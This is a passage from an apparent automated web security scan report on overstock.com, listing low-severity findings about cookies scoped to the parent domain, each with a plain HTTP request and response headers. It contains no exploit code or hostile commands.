Pragma: no-cache
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Chairs/2737/subcat.html|searchhistory^categories; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 247876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.9. http://www.overstock.com/Home-Garden/Furniture/32/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/32/dept.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Furniture/32/dept.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:42 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:42 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:42 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/32/dept.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 272829

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.10. http://www.overstock.com/Home-Garden/Furniture/Clearance,/clearance,/32/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/Clearance,/clearance,/32/dept.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Furniture/Clearance,/clearance,/32/dept.html?sort=Top+Secret&TID=R:MOD_B HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:45 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/Clearance%2C/clearance%2C/32/dept.html%3Fsort%3DTop%2BSecret|searchhistory^categories,clearance"; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 234760

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.11. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/Simmons,/brand,/32/dept.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Furniture/Simmons,/brand,/32/dept.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:45 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/Simmons%2C/brand%2C/32/dept.html|searchhistory^categories,brand"; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 167181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.12. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html?IID=prod3348501&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:02 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:02 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:02 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3348501|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:02 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 137959

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.13. http://www.overstock.com/Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Oval-tip-Burnt-Paisley-Arm-Chair/3867484/product.html?IID=prod3867484&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:57 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:57 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:57 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3867484|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:57 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=9
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 135092

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.14. http://www.overstock.com/Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Retro-classic-White-Accent-Chairs-Set-of-2/4092961/product.html?IID=prod4092961&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:00 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:00 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:00 GMT; Path=/
Set-Cookie: mxcproclicks=4092961|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:00 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 130342

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.15. http://www.overstock.com/Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home-Garden/Zebra-Print-Oval-Back-Chair/2552133/product.html?IID=prod2552133&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:47 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:47 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=2552133|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:47 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:47 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 136806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.16. http://www.overstock.com/cart  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /cart

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cart HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:38 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:38 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:38 GMT; Path=/
Set-Cookie: clubogiftcards=; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=29
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 55916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.c
...[SNIP]...

2.17. http://www.overstock.com/Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Clothing-Shoes/Tailorbyrd-Mens-V-neck-Argyle-Wool-Sweater/4822008/product.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:32:06 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:32:06 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4822008|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:06 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:32:06 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 119278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...

2.18. http://www.overstock.com/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /community

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:39 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:39 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
